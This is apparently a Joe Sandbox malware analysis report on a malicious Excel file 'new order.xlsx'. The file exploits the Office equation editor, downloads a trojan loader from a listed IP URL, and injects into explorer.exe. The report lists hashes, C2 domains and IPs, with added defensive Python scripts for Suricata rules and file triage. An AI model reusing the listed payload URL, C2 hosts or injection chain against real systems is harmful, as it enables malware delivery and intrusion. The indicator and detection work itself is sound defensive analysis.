| External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing3 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Extra Window Memory Injection1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |

          Behavior Graph

Behavior Graph ID: 452636 | Sample: new order.xlsx | Start date: 22/07/2021 | Architecture: WINDOWS | Score: 100
[Graph image not reproduced; nodes and edges recovered from the graph text:]
Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures. Contacted domain: www.legifo.com.
EXCEL.EXE: dropped C:\Users\user\Desktop\~$new order.xlsx (data).
EQNEDT32.EXE: contacted 103.155.80.130:80 (local port 49167; TWIDC-AS-AP TWIDC Limited, HK); dropped C:\Users\user\AppData\Local\...\bin[1].exe (PE32) and C:\Users\Public\vbc.exe (PE32); signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802); started vbc.exe.
vbc.exe: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes; started vbc.exe (child).
vbc.exe (child): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection); injected explorer.exe.
explorer.exe (injected): contacted www.globaltradeview.com 199.59.242.153:80 (local port 49169; BODIS-NJ, US), www.thinking-diversity.com and 2 other IPs or domains; System process connects to network (likely due to code injection or exploit); started wlanext.exe.
wlanext.exe: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; started cmd.exe.


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

| Source | Detection | Scanner | Label |
| new order.xlsx | 30% | Virustotal | |
| new order.xlsx | 28% | ReversingLabs | Document-OLE.Exploit.CVE-2018-0802 |

Dropped Files

| Source | Detection | Scanner | Label |
| C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML | |
| C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe | 100% | Joe Sandbox ML | |
| C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe | 32% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
| C:\Users\Public\vbc.exe | 32% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |

Unpacked PE Files

| Source | Detection | Scanner | Label |
| 7.2.vbc.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |

Domains

| Source | Detection | Scanner | Label |
| www.globaltradeview.com | 0% | Virustotal | |


Domains and IPs

Contacted Domains

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| thinking-diversity.com | 34.102.136.180 | true | false | | unknown |
| www.globaltradeview.com | 199.59.242.153 | true | true | | unknown |
| www.legifo.com | 52.58.78.16 | true | false | | unknown |
| www.thinking-diversity.com | unknown | unknown | true | | unknown |
| www.compareionizers.com | unknown | unknown | true | | unknown |

Contacted URLs

| Name | Malicious | Antivirus Detection | Reputation |
| http://www.thinking-diversity.com/n84e/?m8ot=8pa4DPp09N0DbNR0&YP=KbrClequBVdtRHK/gZ2KmWZGYK0xt8ME2AlExBVUQacHPbAvPt6PKzpjA4rIGWPVOlDf0Q== | false | Avira URL Cloud: safe | unknown |

                  URLs from Memory and Binaries

                                                                                            http://google.pchome.com.tw/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://www.rambler.ru/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://uk.search.yahoo.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://espanol.search.yahoo.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://www.ozu.es/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://search.sify.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://openimage.interpark.com/interpark.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://search.ebay.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://www.gmarket.co.kr/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://search.nifty.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://searchresults.news.com.au/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.google.si/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://www.google.cz/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://www.soso.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.univision.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://search.ebay.it/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.asharqalawsat.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://busca.orange.es/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000008.00000000.2228808458.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://search.yahoo.co.jpexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://www.target.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://buscador.terra.es/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://search.orange.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.iask.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.tesco.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://cgi.search.biglobe.ne.jp/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://search.seznam.cz/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://suche.freenet.de/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://search.interpark.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://clients5.google.com/complete/search?hl=explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          http://investor.msn.com/explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://search.espn.go.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.myspace.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://search.centrum.cz/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://p.zhongsou.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://service2.bfast.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown

                                                                                                                                                  Contacted IPs


                                                                                                                                                  Public

IP | Domain | Country | ASN | ASN Name | Malicious
199.59.242.153 | www.globaltradeview.com | United States | 395082 | BODIS-NJ (US) | true
34.102.136.180 | thinking-diversity.com | United States | 15169 | GOOGLE (US) | false
103.155.80.130 | unknown | unknown | 134687 | TWIDC-AS-AP TWIDC Limited (HK) | true
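
The table above is the part of this report a SOC actually consumes, so here is an added example (my code, not part of the Joe Sandbox report) that turns it into indicators and checks them against log data. The three CONTACTED rows copy the table; only the two rows the report flags as malicious go into the blocklist, and the Google-hosted 34.102.136.180, rated not malicious, is deliberately left out because blocking a shared cloud address hits unrelated traffic. The DNS and proxy log lines, the rule messages and the starting SID are constructed for the demo and are not from the report.

```python
"""Turn the Contacted IPs table of this report into indicators and detections.

Added example (not part of the Joe Sandbox report). The three CONTACTED rows
copy the table; the log lines, rule messages and SIDs are constructed.
"""
import ipaddress
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ContactedHost:
    ip: str
    domain: str        # "unknown" when the report lists no domain for the IP
    country: str
    asn: int
    asn_name: str
    malicious: bool    # the report's own verdict for the row


# Rows as reported under Contacted IPs (Public) in this analysis.
CONTACTED = [
    ContactedHost("199.59.242.153", "www.globaltradeview.com", "United States", 395082, "BODIS-NJ", True),
    ContactedHost("34.102.136.180", "thinking-diversity.com", "United States", 15169, "GOOGLE", False),
    ContactedHost("103.155.80.130", "unknown", "unknown", 134687, "TWIDC-AS-AP TWIDC Limited", True),
]


def build_blocklist(hosts):
    """Return (ips, domains) for the rows the report flags as malicious.

    Non-malicious rows are left out on purpose: 34.102.136.180 sits in a Google
    ASN, and blocking a shared cloud address would hit unrelated traffic.
    A domain is included only when the report actually lists one.
    """
    ips = {h.ip for h in hosts if h.malicious}
    domains = {h.domain.lower() for h in hosts if h.malicious and h.domain != "unknown"}
    return ips, domains


def to_suricata_rules(hosts, sid_base=1000000):
    """Emit one Suricata rule per malicious indicator: a dns.query match per
    domain, an IP-layer match per address. sid_base is a constructed start
    value; pick one from your local SID range."""
    ips, domains = build_blocklist(hosts)
    rules, sid = [], sid_base
    for d in sorted(domains):
        rules.append(
            f'alert dns $HOME_NET any -> any any (msg:"Joe Sandbox 452636 malicious contact {d}"; '
            f'dns.query; content:"{d}"; nocase; sid:{sid}; rev:1;)')
        sid += 1
    for ip in sorted(ips, key=ipaddress.IPv4Address):
        rules.append(
            f'alert ip $HOME_NET any -> {ip} any (msg:"Joe Sandbox 452636 malicious contact {ip}"; sid:{sid}; rev:1;)')
        sid += 1
    return rules


IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)


def match_line(line, ips, domains):
    """Return the set of indicators present in one log line."""
    hits = set()
    for cand in IPV4_RE.findall(line):
        try:
            ipaddress.IPv4Address(cand)   # rejects e.g. 999.1.1.1, which the regex accepts
        except ValueError:
            continue
        if cand in ips:
            hits.add(cand)
    for host in HOST_RE.findall(line):
        if host.lower() in domains:
            hits.add(host.lower())
    return hits


# Constructed log lines (not from the report): two BIND-style query-log entries
# and two Squid-style access-log entries from a hypothetical internal network.
SAMPLE_LOGS = [
    "22-Jul-2021 17:12:01.113 client 10.0.0.17#51234: query: www.globaltradeview.com IN A + (10.0.0.1)",
    "22-Jul-2021 17:12:02.440 client 10.0.0.17#51235: query: thinking-diversity.com IN A + (10.0.0.1)",
    "1626973925.001    312 10.0.0.17 TCP_MISS/200 684 POST http://103.155.80.130/ - HIER_DIRECT/103.155.80.130 text/html",
    "1626973926.002    118 10.0.0.22 TCP_MISS/200 512 GET http://www.example.com/ - HIER_DIRECT/93.184.216.34 text/html",
]


def scan(lines, hosts=CONTACTED):
    """Return [(line_index, sorted indicators)] for every line touching a malicious host."""
    ips, domains = build_blocklist(hosts)
    out = []
    for i, line in enumerate(lines):
        hits = match_line(line, ips, domains)
        if hits:
            out.append((i, sorted(hits)))
    return out


if __name__ == "__main__":
    for rule in to_suricata_rules(CONTACTED):
        print(rule)
    for idx, hits in scan(SAMPLE_LOGS):
        print(f"line {idx}: {', '.join(hits)}")
```

The second DNS line (thinking-diversity.com) produces no hit, which is the intended behaviour: the report rates that host as not malicious, and the matcher keys on the report's verdict rather than on every address the sample touched.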

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                  Analysis ID:452636
                                                                                                                                                  Start date:22.07.2021
                                                                                                                                                  Start time:17:09:37
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 11m 34s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:light
                                                                                                                                                  Sample file name:new order.xlsx
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                  Number of analysed new started processes analysed:9
                                                                                                                                                  Number of new started drivers analysed:2
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
Classification: mal100.troj.expl.evad.winXLSX@9/13@4/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 27.6% (good quality ratio 26.2%)
• Quality average: 71.1%
• Quality standard deviation: 29%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, conhost.exe
• TCP Packets have been reduced to 100
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time      Type             Description
17:11:10  API Interceptor  100x Sleep call for process: EQNEDT32.EXE modified
17:11:14  API Interceptor  221x Sleep call for process: vbc.exe modified
17:11:55  API Interceptor  205x Sleep call for process: wlanext.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

Domains

No context

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: downloaded
Size (bytes): 721408
Entropy (8bit): 7.749166309747153
Encrypted: false
SSDEEP: 12288:8xQ/7SxjdzTy44OiFTH/xar1sFrnRQPjiN4/3fhAjxDRHEiloRyp:8xQmfy44jtxxFtUjq4/pMxDJ
MD5: 750919BD7E02E7821EFA1B1BD0ED4EDA
SHA1: 2D925D1D04D12C72E4411D84B2C2B297D09F2C3C
SHA-256: 994F99037072FBEA77A376832818FEC2BDAF577A09B1936A7285E38ACE5D8E4F
SHA-512: 087D25C798E2429B34B408FF0A315018A46FEB833D5286AB87835B5B2E49FD7B3079FACF5BE7CE44EC5E5869F2390AB50066DFDAAAE7F638C0F9D427B919162F
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 32%
Reputation: low
IE Cache URL: http://103.155.80.130/kung/bin.exe
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5..`..............P.................. ... ....@.. .......................`............@.................................<...O.... ..X....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...X.... ......................@..@.reloc.......@......................@..B................p.......H.......X....&...........................................................O.z....T....N..~/...-...u..JF.y?..E\.!.<._...|.dI..6.....\..<...j.......9....#`..U.E.....b........u..p...F.+..lq..).E=m....2...m.'.8/.dk.......Y.J.f..l...h.N.v.9B.*.........5%.kOUAK.......^...c0V...0.D.......................S........k1..c_.'T..zi:.....B..r.*v.c.N.r.P..o...{....(...M.3..0|.k.}4..Ki..#.y.+T1U..~....../......{..Z..!l'.>.E.EzL..Q.=7....X.P.qft.....1.%>....^..[c(.....)..s.0...
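The entry above reports the downloaded loader's 8-bit entropy, its digests and an MZ preview, sitting next to the image files Office parks in its Content.MSO cache. The script below is an added example, not the sandbox's own code, that reproduces those checks for a folder of dropped files: the same Shannon entropy the report lists, MD5/SHA-1/SHA-256 digests, a magic-bytes check that flags a PE header stored under a non-executable name, and a lookup against the SHA-256 quoted for bin.exe. The entropy threshold, the sample names and the sample bytes are assumptions, constructed here so the block runs offline.

```python
"""Triage helper for files dropped by a malicious Office document.

Added example; not part of the sandbox report. Reproduces the checks the
report surfaces: 8-bit Shannon entropy, file digests, a magic-bytes type
check, and a match against the IOC hash listed for the dropped loader.
"""
import hashlib
import math
import os
from collections import Counter

# SHA-256 quoted from the bin.exe entry in the report (lowercased).
KNOWN_BAD_SHA256 = {
    "994f99037072fbea77a376832818fec2bdaf577a09b1936a7285e38ace5d8e4f": "bin.exe (FormBook loader)",
}

# Assumed threshold: compressed images legitimately exceed it (the PNGs in the
# report are ~7.97), so it is only applied to PE files and unrecognised blobs.
HIGH_ENTROPY = 7.2

EXECUTABLE_EXTS = {"exe", "dll", "scr", "cpl", "sys"}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy: 0.0 for a constant file, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def digests(data: bytes) -> dict:
    """MD5 / SHA-1 / SHA-256 in the hex form the report prints."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def sniff(data: bytes) -> str:
    """Classify by magic bytes rather than by file extension."""
    if data.startswith(b"MZ"):
        return "pe"
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return "png"
    if data.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    # EMF: record type EMR_HEADER (1) at offset 0, " EMF" signature at offset 40.
    if len(data) >= 44 and data[:4] == b"\x01\x00\x00\x00" and data[40:44] == b" EMF":
        return "emf"
    return "unknown"


def triage(name: str, data: bytes) -> dict:
    """Return the report-style fields for one file plus a list of findings."""
    kind = sniff(data)
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    entropy = shannon_entropy(data)
    d = digests(data)
    findings = []
    if kind == "pe":
        findings.append("executable dropped")
        if ext not in EXECUTABLE_EXTS:
            findings.append("PE header under non-executable extension ." + ext)
    if kind in ("pe", "unknown") and entropy > HIGH_ENTROPY:
        findings.append(f"high entropy {entropy:.2f}: packed or encrypted payload likely")
    if d["sha256"] in KNOWN_BAD_SHA256:
        findings.append("sha256 matches report IOC: " + KNOWN_BAD_SHA256[d["sha256"]])
    return {"name": name, "type": kind, "size": len(data), "entropy": round(entropy, 3),
            **d, "findings": findings}


def scan_directory(root: str) -> list:
    """Triage every file below root, e.g. the user's Content.MSO cache."""
    results = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            with open(os.path.join(dirpath, fn), "rb") as fh:
                results.append(triage(fn, fh.read()))
    return results


# Constructed sample inputs (assumptions, not the real dropped files).
SAMPLES = {
    "sample_a.jpeg": b"MZ" + bytes(range(256)) * 8,          # PE bytes under an image name
    "sample_b.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 500,   # benign-looking PNG stub
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        r = triage(name, blob)
        print(f"{r['name']:14} {r['type']:8} entropy={r['entropy']:.3f} "
              f"sha256={r['sha256'][:16]}... findings={r['findings']}")
```

Run it against C:\Users\<user>\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO and the user profile root with `scan_directory()`; anything typed `pe` in those locations, or whose SHA-256 hits the IOC set, is the dropped loader regardless of what the filename claims.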
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\238B5502.emf
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):648132
                                                                                                                                                  Entropy (8bit):2.8123774663976793
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:d34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:94UcLe0JOcXuunhqcS
                                                                                                                                                  MD5:3C7747E6D9F426944566A7CC7A5A2608
                                                                                                                                                  SHA1:146829010E3A61D52397CF8F08EFAC4C29BB4859
                                                                                                                                                  SHA-256:0295DFBAED0E54EE9EA659CCF39A71783994C92F80F7E3F98CBF878534E71017
                                                                                                                                                  SHA-512:F82B007083F360DD8EEB2D799F35004E393405B6FCF5088D29A74C229D428A97331A07DA106AC1B087D80325C28668C6167D2C59181C52B83F0281BE864387B6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................x$......-z.x.@..%.............8......N[P8..0.............N[P8..0.. ....y.x0..8.. ............z.x........................................%...X...%...7...................{$..................C.a.l.i.b.r.i..............X...0..d.............vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... .m.6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3515A697.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):94963
                                                                                                                                                  Entropy (8bit):7.9700481154985985
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                                                                                                                                                  MD5:17EC925977BED2836071429D7B476809
                                                                                                                                                  SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                                                                                                                                                  SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                                                                                                                                                  SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\50113C60.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):85020
                                                                                                                                                  Entropy (8bit):7.2472785111025875
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                                                                                  MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                                                                                  SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                                                                                  SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                                                                                  SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                                                                                  Malicious:false
